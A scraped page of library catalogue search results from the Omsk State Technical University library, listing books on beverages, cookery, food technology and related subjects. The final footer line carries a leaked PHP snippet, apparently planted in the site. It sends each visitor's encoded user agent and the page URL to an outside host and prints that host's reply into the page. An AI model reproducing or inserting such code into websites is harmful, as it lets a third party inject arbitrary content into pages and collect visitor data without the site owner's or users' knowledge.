Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

188 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=НАПИТКИ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 126
1. 
Сборник рецептур блюд и кулинарных изделий [Текст] : Для предприятий обществ. питания / Авт.-сост. : А. И. Здобнов, В. А. Цыганенко, М. И. Пересичный, 2002. - 656 с.
Держатели документа (Информация об экземплярах) 
2. 
Кулькова Л. В. Приготовление коктейлей и других смешанных напитков [Текст] : Учеб. пособие / Л. В. Кулькова, 2002. - 376 с.
3. 
Тимошенко В. Я. Технология производства ликеров, наливок и настоек [Текст] : учеб. для техникумов / В. Я. Тимошенко, 1939. - 239, [1] с.
Держатели документа (Информация об экземплярах) 
4. 
Калугина, Надежда Геннадьевна. Профилактическая работа инспектора ОППН с несовершеннолетними, употребляющими наркотические вещества и спиртные напитки [Текст] : лекция / Н. Г. Калугина, 1998. - 19 с.
Держатели документа (Информация об экземплярах) 
5. 
Анфимова Н. А. Кулинария [Текст] : Учеб. пособие для студ. учреждений сред. проф. образования / Н. А. Анфимова, Л. Л. Татарская, 2002. - 325 с.
6. 
Анфимова Н. А. Кулинария [Текст] : Учеб. для учреждений нач. проф. образования / Н. А. Анфимова, Л. Л. Татарская, 1998. - 324 с.
Держатели документа (Информация об экземплярах) 
7. 
Шатун Л. Г. Технология приготовления пищи [Текст] : Учеб. / Л. Г. Шатун, 2004. - 479 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- КОНТРОЛЬ КАЧЕСТВА блюд -- Клеймо ветеринарное -- МЕНЮ -- ПИТАНИЕ учащихся -- БАД -- ДОБАВКА ПИЩЕВАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ПРОДУКТОВ тепловая -- СУП -- БЛЮДА МЯСНЫЕ -- СОУС -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ сои -- Соя -- ПРАВИЛА отпуска блюд -- ПРАВИЛА подачи напитков
Держатели документа (Информация об экземплярах) 
8. 
Барановский В. А. Повар-технолог [Текст] : Учеб. пособие для студ. сред. спец. заведений / В. А. Барановский, 2003. - 415 с.
Ключевые слова 
ФИЗИОЛОГИЯ ПИТАНИЯ -- САНИТАРИЯ -- ГИГИЕНА ОБЩЕСТВЕННОГО ПИТАНИ -- ПИТАНИЕ -- ГИГИЕНА ЛИЧНАЯ повара -- ОБРАБОТКА продуктов -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА КРОЛИКОВ -- БЛЮДА ХОЛОДНЫЕ -- БЛЮДА горячие -- ЗАКУСКА -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- СУП -- СОУС -- ПРЯНОСТИ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА СЛАДКИЕ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- НАПИТКИ -- ТЕСТО -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО БЕЗДРОЖЖЕВОЕ -- ТЕСТО слоеное -- ТЕСТО песочное -- ТЕСТО бисквитное -- ТЕСТО заварное
Держатели документа (Информация об экземплярах) 
9. 
Ковалев Н. И. Технология приготовления пищи [Текст] : Учеб. для студ. сред. спец. учеб. заведений / Н. И. Ковалев, М. Н. Куткина, В. А. Кравцова; Под ред. М. А. Николаевой, 2003. - 467 с.
Ключевые слова 
КУЛИНАРИЯ - История -- ТЕХНОЛОГИЯ общественного питания -- КЛАССИФИКАЦИЯ кулинарной продукции -- АССОРТИМЕНТ кулинарной продукции -- ОБРАБОТКА овощей -- ОБРАБОТКА плодов -- ОБРАБОТКА грибов -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА нерыбного водного сырья -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- Супы -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА из бобовых -- БЛЮДА ИЗ макаронных изделий -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА из птицы -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- БЛЮДА ХОЛОДНЫЕ -- НАПИТКИ -- БЛЮДА из муки -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ школьников -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
10. 
Скутин, Евгений Дмитриевич. Мультисенсорные газоаналитические системы "электронный нос". Разработка, применение и перспективы [Текст] : монография / Е. Д. Скутин, 2009. - 227 с.
Оглавление 
  • Введение. - с.6
  • Массивы кондуктометрических сенсоров. - с.9
  • Общие принципы построения однородных массивов. - с.9
  • Металл-оксидные сенсоры. - с.14
  • Принцип действия. - с.14
  • Характеристики газочувствительных оксидов. - с.16
  • Совершенствование оксидных материалов. - с.18
  • Конструкции сенсорных массивов. - с.21
  • Приложения. - с.23
  • Термокаталитические сенсоры. - с.24
  • Принцип работы . - с.24
  • Параметры конструкции. - с.26
  • Выходной сигнал. - с.28
  • Отравление катализатора. - с.29
  • Перспективы . - с.31
  • Одноэлектродные полупроводниковые сенсоры. - с.32
  • Принцип работы . - с.32
  • Одноэлектродные сенсоры и пеллисторы: сходство и различия. - с.35
  • Преимущества и недостатки одноэлектродных сенсоров. - с.37
  • Перспективы применения одноэлектродных сенсоров. - с.39
  • Массивы хеморезисторов на основе проводящих полимеров. - с.40
  • Принцип действия. - с.40
  • Изготовление массивов. - с.43
  • Приложения. - с.46
  • Перспективы развития. - с.48
  • Массивы хеморезисторов из композитных полимеров. - с.49
  • Принцип действия. - с.49
  • Изготовление сенсорных массивов. - с.50
  • Перспективные направления развития . - с.53
  • Однородные массивы сложных сенсоров. - с.55
  • Массивы газочувствительных полевых транзисторов. - с.55
  • Принцип работы . - с.55
  • Изготовление и работа. - с.56
  • Приложения. - с.57
  • Альтернативное исполнение МДП сенсоров. - с.57
  • Гибридные сенсорные массивы. - с.59
  • Массивы оптических сенсоров. - с.60
  • Оптические сенсоры и сенсорные массивы. - с.60
  • Массивы оптических сенсоров с полимерным покрытием. - с.61
  • Изготовление массивов ОВС. - с.62
  • Способы повышения разнообразия сенсоров. - с.63
  • Самокодирующиеся сенсорные бусины. - с.64
  • Обработка данных оптического сенсорного массива. - с.65
  • Масс-чувствительные сенсоры. - с.66
  • Пьезоэлектрические сенсоры. - с.66
  • Массивы ККМ сенсоров. - с.68
  • Сенсоры на поверхностных акустических волнах. - с.70
  • Моделирование отклика сенсоров. - с.73
  • Массивы электрохимических сенсоров. - с.74
  • Сенсорные устройства для анализа жидких сред. - с.74
  • Потенциометрические (равновесные) измерения. - с.76
  • Вольтамперометрические (неравновесные) измерения. - с.89
  • Аналитические преимущества мультисенсорных систем. - с.95
  • Сенсорные устройства высокого порядка. - с.101
  • Принципы построения гибридных массивов. - с.101
  • Порядок устройства и аналитические признаки. - с.101
  • Ортогональность и независимость. - с.102
  • Перекрестная схема чувствительность и разнообразие. - с.103
  • Многогранная роль избыточности. - с.104
  • Массивы идентичных преобразователей. - с.106
  • Анализ переходных процессов. - с.106
  • Анализ температурной модуляции. - с.116
  • Массивы различных преобразователей. - с.119
  • Металлические и металл-оксидные газовые сенсоры. - с.119
  • Полимерные газовые сенсоры. - с.121
  • Массивы газовых сенсоров с различающимися типами преобразователей и чувствительных материалов. - с.124
  • Оптимизация массива. - с.129
  • Выбор сенсоров. - с.129
  • Выбор аналитических признаков. - с.130
  • Микроаналитические сенсорные системы. - с.133
  • Классический "электронный нос". - с.134
  • Новые технологии. - с.135
  • Объединенные технологии. - с.138
  • Применение мультисенсорных систем. - с.140
  • Прикладные области. - с.141
  • Пищевые продукты и напитки. - с.145
  • Экологический контроль и безопасность. - с.153
  • Диагностика заболеваний . - с.159
  • Тенденции и направления развития . - с.165
  • Пробоотбор. - с.166
  • Фильтры и разделение анализируемых газов. - с.168
  • Оценка данных . - с.171
  • Заключение. - с.174
  • Библиографический список. - с.176
  • Приложение 1. - с.220
  • Приложение 2. - с.221
  • Основные обозначения. - с.223
  • Принятые сокращения. - с.225
Держатели документа (Информация об экземплярах) 

В монографии рассмотрены основные достижения в области разработки и применения мультисенсорных газоаналитических систем типа "электронный нос". Главное внимание уделено способам расширения возможностей газоаналитических систем за счет применения гибридных сенсорных массивов и добавления новых размерностей в пространстве аналитических сигналов. Обсуждается влияние селективности и избыточности сенсорных систем на достоверность получаемой аналитической информации. Сделан обзор современных и перспективных приложений мультисенсорных систем "электронный нос".

Полный текст
11. 
Завистовска, Зофья. Диетическое питание при различных заболеваниях [Текст] / З. Завистовска, 1992. - 221, [1] с.
Ключевые слова 
ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА ПИТАНИЯ -- ПИТАНИЕ ЗДОРОВОЕ -- БЕЛКИ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- САХАРИДЫ - ПИТАНИЕ -- ЖИРЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАНИЕ -- ВОДА - ПИТАНИЕ -- ВИТАМИНЫ- ПИТАНИЕ -- МЕНЮ ДИЕТИЧЕСКОЕ -- ДИЕТА ЛЕЧЕБНАЯ -- ДИЕТА ЛЕГКОУСВОЯЕМАЯ -- БОЛЕЗНЬ ЖЕЛУДКА - ПИТАНИЕ -- БОЛЕЗНЬ КИШЕЧНИКА - ПИТАНИЕ -- БОЛЕЗНЬ ПЕЧЕНИ - ПИТАНИЕ -- ДИАБЕТ САХАРНЫЙ - ПИТАНИЕ -- ОЖИРЕНИЕ - ПИТАНИЕ -- БОЛЕЗНЬ СЕРДЦА - ПИТАНИЕ -- БОЛЕЗНЬ ПОЧЕК - ПИТАНИЕ -- ТЕМПЕРАТУРА ВЫСОКАЯ - ПИТАНИЕ -- ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ -- ПИТАНИЕ КОРМЯЩИХ МАТЕРЕЙ -- СУПЫ - ПИТАНИЕ ЛЕЧЕБНОЕ -- ОВОЩИ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА МУЧНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ КРУП - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ ЯИЦ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА МЯСНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА РЫБНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- СОУС - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА СЛАДКИЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ ДИЕТИЧЕСКИЕ -- НАПИТКИ - ПИТАНИЕ ЛЕЧЕБНОЕ
12. 
Чепурной, Иван Петрович. Товароведение и экспертиза вкусовых товаров [Текст] : Учеб. для вузов по специальности "Товароведение и экспертиза товаров" / И. П. Чепурной, 2002. - 402, [1] с.

Вкусовые товары включают очень разнообразные по составу и свойствам <продовольственные> товары: <чай> и <кофе>, <пряности> и <приправы>, <безалкогольные> и <алкогольные> <напитки>. В данной книге представлены достаточно полные сведения о классификации этих групп товаров, приводятся факторы, формирующие и сохраняющие их <качество>.

Впервые приводятся методологические подходы к проведению экспертизы этой группы товаров с использованием как современных методов анализа, так и оригинальных экспресс-методов.

13. 
Экспертиза напитков [Текст] : Учеб. пособие для вузов по специальности "Товароведение и экспертиза товаров" / В. М. Поздняковcкий, В. А. Помозова, Т. Ф. Киселева, Л. В. Пермякова; Под ред. В. М. Позняковского, 2002. - 382 с.
Держатели документа (Информация об экземплярах) 

Книга содержит наиболее полный учебно-справочный материал по экспертизе спирта этилового, водок, коньяков, вин, пива, ликеро-водочных и безалкогольных напитков, включая импортируемую продукцию.

14. 
Экспертиза напитков [Текст] : Учеб. пособие для вузов по специальности "Товароведение и экспертиза товаров" / В. М. Позняковский, В. А. Помозова, Т. Ф. Киселева, Л. В. Пермякова; Под общ. ред. В. М. Позняковского, 2001. - 382 с.
15. 
Бирюкова, Вера Васильевна. Технология производства продукции общественного питания [Текст] : Учеб. пособие для вузов по специальности 060800 "Экономика и управление на предприятии (торговли и общественного питания)" / В. В. Бирюкова, Н. В. Шевченко, 2004. - 106 с.
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
16. 
Королев, Дмитрий Амосович. Русский квас [Текст] / Д. А. Королев, 1963. - 54, [1] с.
Держатели документа (Информация об экземплярах) 
17. 
Чудеса в микроволновой печи [Текст] : рецепты и полез. советы для кулинара / сост. О. В. Крылова, 1994. - 286, [2] с.
18. 
Современная киргизская кухня [Текст] : сб. рецептур / сост. С. Ш. Ибрагимова, 1991. - 222, [2] с.
19. 
Кощеев, Александр Аркадьевич. Напитки из дикорастущих плодов и ягод [Текст] / А. А. Кощеев, 1991. - 63, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
20. 
Абатуров, Павел Васильевич. Сладкие блюда. Напитки [Текст] / П. В. Абатуров, Н. П. Цыпленков, 1958. - 136 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3183 - 26.02.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.09 с.12 запросов, 0.57c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;